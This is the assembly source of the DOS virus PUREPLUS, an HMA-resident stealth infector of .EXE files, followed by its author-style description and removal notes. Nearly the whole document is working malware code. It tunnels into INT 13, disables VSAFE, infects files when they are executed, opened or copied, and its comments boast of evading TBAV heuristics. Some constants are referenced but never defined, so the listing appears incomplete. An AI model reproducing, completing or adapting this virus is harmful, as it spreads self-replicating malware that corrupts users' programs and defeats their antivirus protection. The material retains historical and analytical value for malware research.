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synced 2025-02-01 06:47:28 +00:00
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509 lines
22 KiB
cseg segment para public 'code'
pureplus proc near
assume cs:cseg
;designed by "Q" the misanthrope.
ALLOCATE_HMA equ 04a02h
CLOSE_HANDLE equ 03e00h
COM_OFFSET equ 00100h
DENY_NONE equ 040h
DONT_SET_TIME equ 040h
DOS_INT equ 021h
DOS_SET_INT equ 02500h
EXEC_PROGRAM equ 04b00h
FAIL equ 003h
FAR_INDEX_CALL equ 01effh
FIND_FIRST equ 04e00h
FIND_NEXT equ 04f00h
FIRST_FCB equ 05ch
FLUSH_BUFFERS equ 00d00h
FOUR_BYTES equ 004h
GET_DTA equ 02f00h
GET_ERROR_LEVEL equ 04d00h
HARD_DISK_ONE equ 081h
HIDDEN equ 002h
HIGH_BYTE equ 00100h
HMA_SEGMENT equ 0ffffh
INT_13_VECTOR equ 0004ch
JOB_FILE_TABLE equ 01220h
MAX_SECTORS equ 078h
NEW_EXE_HEADER equ 00040h
NULL equ 00000h
ONLY_READ equ 000h
ONLY_WRITE equ 001h
ONE_BYTE equ 001h
OPEN_W_HANDLE equ 03d00h
READ_A_SECTOR equ 00201h
READ_ONLY equ 001h
READ_W_HANDLE equ 03f00h
REMOVE_NOP equ 001h
RESET_CACHE equ 00001h
RESIZE_MEMORY equ 04a00h
SECOND_FCB equ 06ch
SECTOR_SIZE equ 00200h
SETVER_SIZE equ 018h
SHORT_JUMP equ 0ebh
SIX_BYTES equ 006h
SMARTDRV equ 04a10h
SYSTEM equ 004h
SYS_FILE_TABLE equ 01216h
TERMINATE_W_ERR equ 04c00h
THREE_BYTES equ 003h
TWENTY_HEX equ 020h
TWO_BYTES equ 002h
UNINSTALL equ 05945h
UN_SINGLE_STEP equ not(00100h)
VERIFY_3SECTORS equ 00403h
VSAFE equ 0fa01h
WRITE_A_SECTOR equ 00301h
WRITE_W_HANDLE equ 04000h
PURE_CODE_IS_AT equ 00147h
bios_seg segment at 0f000h ;just some dummy area that was needed
org 00000h ;to have the compilier make a far jmp
old_int_13_addr label word ;directive EAh later on
bios_seg ends
org COM_OFFSET ;com files seem to always start here
jmp short disable_vsafe
;simple EXE header that we have imbedded the virii into
org PURE_CODE_IS_AT ;here because many exe files have 00's after this location
ax_cx_di_si_cld proc near ;sets varables for modifying sector
mov di,bx ;ES:BX is int 13 sector set di to bx
ax_cx_si_cld: call set_si ;get location of code in HMA
set_si: pop si ;and subtract the offset
sub si,word ptr (offset set_si)-word ptr (offset ax_cx_di_si_cld)
mov ax,XOR_CODE ;ah is value to xor MZ to jmp 015C
das ;set zero flag for the compare later on
cld ;clear direction
ax_cx_di_si_cld endp
;must be here because the MZ 4Dh,5Ah
;.EXE header identifier gets changed to
;jmp 015C EAh,5Ah by changing one byte
disable_vsafe proc near ;while we are here lets allow other virii
mov dx,UNINSTALL ;it sure is nice to have a simple
mov ax,VSAFE ;call to do this
disable_vsafe endp
alloc_memory proc near ;clear disk buffers so reads are done
mov ah,high(FLUSH_BUFFERS)
int DOS_INT ;from disk and not from memory
xor di,di ;set it to zero
mov ds,di ;to set the DS there
mov bh,high(SECTOR_SIZE)
dec di ;now set it to FFFFh
mov ax,ALLOCATE_HMA ;lets see how much memory is available
int MULTIPLEX_INT ;in the HMA - ES:DI points to begining
mov ax,SMARTDRV ;lets flush smartdrv as well for maximum
mov bx,RESET_CACHE ;infection. it sure is nice to have
int MULTIPLEX_INT ;a simple call to do this
mov bl,SIX_BYTES ;for setting int 1 to tunnel
inc di ;if dos <5.0 or no HMA di is FFFFh
jz find_name ;if no memory don't install
call ax_cx_si_cld ;get varables for copy to HMA
rep movs byte ptr es:[di],cs:[si]
alloc_memory endp ;then copy it to ES:DI in HMA
set_int_13 proc near ;setting int 1 vectors for tunnelling
mov ax,offset interrupt_one
xchg word ptr ds:[bx-TWO_BYTES],ax
push ax ;great way to set interrupts
push word ptr ds:[bx];just push them on the stack for latter
mov word ptr ds:[bx],cs
xchg cx,di ;cx was 0, di was last byte of HMA code
mov dl,HARD_DISK_ONE;doesn't really matter which drive
pushf ;save the flags with TF cleared
pushf ;push flags for simulated int 13 call
pushf ;push flags for setting TF
mov bp,sp ;get the stack pointer
or byte ptr ss:[bp+ONE_BYTE],al
popf ;set TF and direction and call int 13
popf ;restore flags
pop word ptr ds:[bx];and int 1 vectors back
pop word ptr ds:[bx-TWO_BYTES]
set_int_13 endp ;now int 13 has our code hooked into it
find_name proc near ;now lets find out who we are to reload
mov ds,word ptr cs:[bx+ENVIRONMENT-SIX_BYTES]
look_for_nulls: inc bx ;ourselves to see if we are cleaned on the fly
cmp word ptr ds:[bx-FOUR_BYTES],di
jne look_for_nulls ;the plan is to goto the end of our
find_name endp ;environment and look for 2 nulls
open_file proc near ;open current program and read header
push ds ;to see if the header was restored back
push bx ;save the program name on the stack
mov ch,THREE_BYTES ;read in 768 bytes of header
call open_n_read_exe ;open, read cx bytes, close file ds:bx
push cs ;set es to cs for compare of sector
pop es ;to infected sector
mov bx,dx ;get varables set correctly for compare
call convert_back ;compare them and convert them back
pop dx ;get file name again
pop ds
jne now_run_it ;if int 13 converted it back then run it
push ds ;else save file name again on stack
push dx
call call_dos ;open current program for reads (don't set any alarms)
push bx ;save handle
int MULTIPLEX_INT ;get job file table for handle
xchg ax,dx ;done like this for anti TBAV hueristic scan
mov bl,byte ptr es:[di]
int MULTIPLEX_INT ;get SFT of handle to change ES:DI
pop bx ;get handle again
mov ch,high(SECTOR_SIZE)
cmpsw ;simple code to change open file to
stosb ;write back the cleaned header to file
mov dx,offset critical_error+COM_OFFSET
int DOS_INT ;this cleans the file if virii didn't load in HMA
call reclose_it ;set SFT to not change file date and time at close
pop dx ;get file name again from the stack
pop ds
open_file endp
now_run_it proc near ;setup the exec of current program again
push cs ;like a spawned file
pop es ;es now cs
mov bx,offset exec_table
mov ah,high(RESIZE_MEMORY)
int DOS_INT ;first resize memory
mov si,offset critical_error+COM_OFFSET+PARAMETER_TABLE
xchg bx,si ;set si to where the table varables are
mov di,bx ;set di to where 14 byte exec table is to be made
mov ax,EXEC_PROGRAM ;set ax for file execute
set_table: scasw ;advance 2 bytes in destination table
movs byte ptr es:[di],cs:[si]
scasb ;move a byte then check if next byte is nonzero
mov word ptr cs:[di],cs
je set_table ;fill in the code segment into table and jmp if still zero
call call_dos ;exec program again
mov ax,FIND_FIRST ;need to infect more EXE files
mov dx,offset exe_file_mask
find_next_file: call call_dos ;set cx to 15 to loop that many times
mov ah,high(GET_DTA);what was the old dta no need to set up a new one
int DOS_INT ;get it
push es ;get the filename into ds:bx
pop ds
call open_n_read_exe ;open, read cx bytes, close file ds:bx
mov ah,high(FIND_NEXT)
loop find_next_file ;loop until no more matches
done: mov ah,high(GET_ERROR_LEVEL)
int DOS_INT ;get spawned childs program errorlevel
mov ah,high(TERMINATE_W_ERR)
now_run_it endp ;and return with that same errorlevel
call_dos proc near ;routine to call dos
int DOS_INT ;call dos
jc done ;error in doing so then exit
xchg ax,bx ;set bx to ax for open file stuff
push cs ;set ds to cs
pop ds ;for all sorts of stuff
ret ;get job file table
call_dos endp ;(done here for anti TBAV hueristic scan)
;these are used to create the 14 byte exec
;table to rerun program
open_n_read_exe proc near ;opens file at ds:bx reads cx bytes then closes
mov dx,bx ;set dx to bx for dos call to open file
call call_dos ;just open it for reading (don't sound any alarms)
mov dx,offset critical_error
int DOS_INT ;see that the call_dos set ds to cs for setting critical error handler
inc dh ;just some dummy area outside in the heap to read the header of the file to
mov ah,high(READ_W_HANDLE)
int DOS_INT ;read it
reclose_it: mov ah,high(CLOSE_HANDLE)
jmp short call_dos ;goto close it
open_n_read_exe endp
interrupt_one proc far ;trace interrupt to imbed into int 13 chain at FFFF:????
jne interrupt_ret ;if not doing int 13 stuff just leave
push ds ;push varables on stack
mov bp,sp ;make bp the sp
lds si,dword ptr ss:[bp+EIGHTEEN_BYTES]
cmp word ptr ds:[si+ONE_BYTE],FAR_INDEX_CALL
jne go_back ;compare the instruction to a far call function
mov si,word ptr ds:[si+THREE_BYTES]
cmp word ptr ds:[si+TWO_BYTES],HMA_SEGMENT
jne go_back ;compare the address of the call to segment FFFFh
cld ;if match then cx is pointing to the far call EAh at
mov di,cx ;the end of virii that needs to be updated
movsw ;move the address to our code
movsw ;far addresses are 4 bytes long
sub di,word ptr (offset far_ptr_addr)-word ptr (offset int_13_entry)
org $-REMOVE_NOP ;now patch in our code into the call chain. only need to change offset because segment is already FFFFh
mov word ptr ds:[si-FOUR_BYTES],di
and byte ptr ss:[bp+TWENTY_THREE],high(UN_SINGLE_STEP)
go_back: popa ;no longer need to singel step
pop ds ;pop off varables
critical_error: mov al,FAIL ;set al to fail for critical error handler (al is a fail 03h anyway from above code ax verify_3sectors 0403h)
interrupt_ret: iret ;dual useage of iret. critical error and int 1
interrupt_one endp ;after running int 1 routine through an int 13 chain we should be hooked in
exe_file_mask db '*.E*',NULL ;.EXE file mask (doesn't need to be specific) also anti TBAV hueristic scan
convert_back proc near ;will convert virii sector es:bx back to clean sector
call ax_cx_di_si_cld ;get all them varables
repe cmps byte ptr cs:[si],es:[di]
jne not_pure ;does it compare byte for byte with our code
xor byte ptr ds:[bx],ah
call ax_cx_di_si_cld ;if it does change the jmp 015C to an MZ EXE header signature
rep stosb ;and zero out all the code
not_pure: ret ;go back to where you once belonged
convert_back endp
convert_to proc near ;will convert sector ds:bx into virii infected
pusha ;save varables onto stack
stc ;say that we failed
pushf ;push failed onto the stack
mov ax,EXE_SIGNATURE;done this way for anti TBAV hueristic scan
cmp word ptr ds:[bx],ax
jne not_exe_header ;if not an EXE header then not interested
mov ax,word ptr ds:[bx+EXE_SECTOR_SIZE]
cmp ax,MAX_SECTORS ;is size of EXE small enough to run as a COM file
ja not_exe_header ;if not then not interested
cmp al,SETVER_SIZE ;was the file the length of SETVER.EXE if so then not interested
je not_exe_header ;(won't load correctly in CONFIG.SYS if SETVER.EXE is infected)
cmp word ptr ds:[bx+NEW_EXE_OFFSET],NEW_EXE_HEADER
jae not_exe_header ;was it a new EXE header (Windows etc) if so then not interested
call ax_cx_di_si_cld ;get all them varables
pusha ;save'em
repe scasb ;was there nothin but 00's at offset 71 to 512 of the sector
popa ;get'em again
jne not_exe_header ;if not then not interested
xor byte ptr ds:[bx],ah
rep movs byte ptr es:[di],cs:[si]
popf ;if all criteria were met for infection then modify sector in memory and insert virii
clc ;pop off the fail indicator
pushf ;and push on the passed indicator
not_exe_header: popf ;get passed/failed indicator
popa ;get varables from stack
ret ;go back to where you once belonged
convert_to endp
interrupt_13 proc far ;will read the sectors at es:bx and infect them if necessary and or clean them on the fly
int_13_entry: cmp ah,high(READ_A_SECTOR)
jb call_old_int_13 ;only interested in reads, writes and verifys
cmp ah,high(VERIFY_3SECTORS)
ja call_old_int_13 ;if otherwise then go to old int 13
push ds ;save ds
push es ;so we can make ds the same as es and save a few bytes
pop ds
call convert_to ;try to convert it to a virii sector
pushf ;set up for interrupt simulation
push cs ;push the cs onto the stack for the iret
call call_old_int_13 ;if command was to write then an infected write occured else memory got overwritten with the read
pushf ;save the result of the int 13 call
call convert_to ;does it need to be converted to a virii sector
pusha ;save the varables onto the stack
jc do_convertback ;if not then see if it needs cleaning
pushf ;now lets write the virii infected sector back to disk
push cs ;simulate an int 13 execution
call call_old_int_13 ;and do it
do_convertback: call convert_back ;does the sector need to be cleaned on the fly
popa ;if it just wrote to the disk then it will need to be cleaned
popf ;or if it is a virii infected sector then clean it
pop ds ;pop off the varables and the result of int 13 simulation done above
retf KEEP_CF_INTACT ;then leave this routine with the carry flag intact
interrupt_13 endp
signature db 'Q' ;must leave my calling card
;must be a far jmp at the last of the sector
;the address of the jmp is in the heap area
;and is filled in by the int 1 trace routine
call_old_int_13 proc near ;far call to actual int 13 that is loaded in the HMA by DOS
jmp far ptr old_int_13_addr
call_old_int_13 endp
;overwrites the address of above but that address
;is not necessary until the virii goes resident in the HMA
goto_dos proc near ;this is our simple EXE file that we infected
nop ;it just simply ends
far_ptr_addr: int DOS_INT ;terminate program
goto_dos endp
pureplus endp ;close up and go home
cseg ends
end com_code
Virus Name: PUREPLUS
V Status: New, Research Viron
Discovery: March, 1994
Symptoms: None - Pure Stealth
Origin: USA
Eff Length: 441 Bytes
Type Code: OReE - Extended HMA Memory Resident Overwriting .EXE Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
The PUREPLUS virus is a HMA memory resident overwriting direct action
infector. The virus is a pure 100% stealth virus with no detectable
symptoms. No file length increase; overwritten .EXE files execute
properly; no interrupts are directly hooked; no change in file date or
time; no change in available memory; INT 12 is not moved; no cross
linked files from CHKDSK; when resident the virus cleans programs on
the fly; works with all 80?86 processors; VSAFE.COM does not detect
any changes; Thunder Byte's Heuristic virus detection does not detect
the virus; Windows 3.1's built in warning about a possible virus does
not detect PUREPLUS.
The PUREPLUS is a variation of the PURE virus that will cause
VSAFE.COM to uninstall.
The PUREPLUS virus will only load if DOS=HIGH in the CONFIG.SYS file.
The first time an infected .EXE file is executed, the virus goes
memory resident in the HMA (High Memory Area). The hooking of INT 13
is accomplished using a tunnelling technique, so memory mapping
utilities will not map it to the virus in memory. It then reloads the
infected .EXE file, cleans it on the fly, then executes it. After the
program has been executed, PUREPLUS will attempt to infect 15 .EXE
files in the current directory.
If the PUREPLUS virus is unable to install in the HMA or clean the
infected .EXE on the fly, the virus will reopen the infected .EXE file
for read-only; modify the system file table for write; remove itself,
and then write the cleaned code back to the .EXE file. It then
reloads the clean .EXE file and executes it. The virus can not clean
itself on the fly if the disk is compressed with DBLSPACE or STACKER,
so it will clean the infected .EXE file and write it back. It will
also clean itself on an 8086 or 8088 processor.
It will infect an .EXE if it is executed, opened for any reason or
even copied. When an uninfected .EXE is copied, both the source and
destination .EXE file are infected.
The PUREPLUS virus overwrites the .EXE header if it meets certain
criteria. The .EXE file must be less than 62K. The file does not
have an extended .EXE header. The file is not SETVER.EXE. The .EXE
header must be all zeros from offset 71 to offset 512; this is where
the PUREPLUS virus writes it code. The PUREPLUS virus then changes
the .EXE header to a .COM file. Files that are READONLY can also be
To remove the virus from your system, change DOS=HIGH to DOS=LOW in
your CONFIG.SYS file. Reboot the system. Then run each .EXE file
less than 62k. The virus will remove itself from each .EXE program
when it is executed. Or, leave DOS=HIGH in you CONFIG.SYS; execute
an infected .EXE file, then use a tape backup unit to copy all your
files. The files on the tape have had the virus removed from them.
Change DOS=HIGH to DOS=LOW in your CONFIG.SYS file. Reboot the
system. Restore from tape all the files back to your system.